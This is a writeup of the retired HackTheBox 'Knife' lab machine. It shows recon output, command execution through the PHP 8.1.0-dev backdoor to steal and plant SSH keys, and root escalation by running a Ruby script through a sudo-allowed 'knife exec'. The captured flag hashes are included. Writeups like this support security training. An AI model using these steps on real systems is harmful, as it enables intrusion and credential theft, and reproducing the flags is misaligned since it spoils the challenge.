HTB: Knife
Posted on 29 Aug 2021 in security • 3 min read
This is a writeup about a retired HacktheBox machine:
Knife published on
May 22 2021 by
MrKN16H
This box is classified as an easy machine. This box implies a PHP dev backdoor
and a misconfigured sudo permission for knife a
chef utility.
User
Recon
We start with an nmap scan. Only port 22 (SSH) and port 80 (HTTP) are open.
# Nmap 7.91 scan initiated Tue May 25 12:12:19 2021 as: nmap -sSV -p- -A -oN notes.md 10.129.151.250
Nmap scan report for 10.129.151.250
Host is up (0.012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
<SNIP>
Web
On the port 80 there is a simple website with no real content. Running nikto
on it show that the PHP version used is 8.1.0-dev.
└─$ nikto -h http://10.129.151.250/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.151.250
+ Target Hostname: 10.129.151.250
+ Target Port: 80
+ Start Time: 2021-05-25 12:15:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
This specific 8.1.0-dev PHP version is vulnerable to a backdoor RCE
Using the exploit script we can directly execute command on the system. A few
enumeration show that we are running command as james and we can grab his SSH
private key.
└─$ python3 rce.py -u http://10.129.151.250/ -c 'cat /home/james/.ssh/id_rsa' > id_rsa
A quick edit allows us remove the "result" from the python script then we use
chmod 600 to fix the SSH key right and avoid the permission warning. Then we
add the key to the authorized_keys file still using the PHP backdoor.
└─$ python3 rce.py -u http://10.129.151.250/ -c 'cat /home/james/.ssh/id_rsa.pub > /home/james/.ssh/authorized_keys'
We can then connect as james on the box and grab the user flag.
└─$ ssh james@10.129.151.250 -i id_rsa
<SNIP>
james@knife:~$ cat user.txt
39169b04d1705adad09a0ba6aafe5363
Root
We look at our permission on the box and found that we can run /usr/bin/knife
on the box. This is a symlink to a ruby script used by
chef.
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
Look at the Knife documentation
we found that knife exec can execute ruby scripts. We execute the id command
to validate that we are running as root and then create the .ssh folder and
add james' SSH key to the authorized_keys.
james@knife:~$ cat h.rb
puts "Hello World"
system "id"
system "mkdir -p /root/.ssh/"
system "cp /home/james/.ssh/authorized_keys /root/.ssh/"
james@knife:~$ sudo /usr/bin/knife exec h.rb -VVV
Hello World
uid=0(root) gid=0(root) groups=0(root)
We can then connect as root on the box (either from our kali or directly from the box) and grab the root flag.
└─$ ssh root@10.129.151.250 -i id_rsa
<SNIP>
root@knife:~# cat root.txt
9c158f53231321d8fdf47e3f431b0a77
Wrapping up
A really easy box perfect for new comers.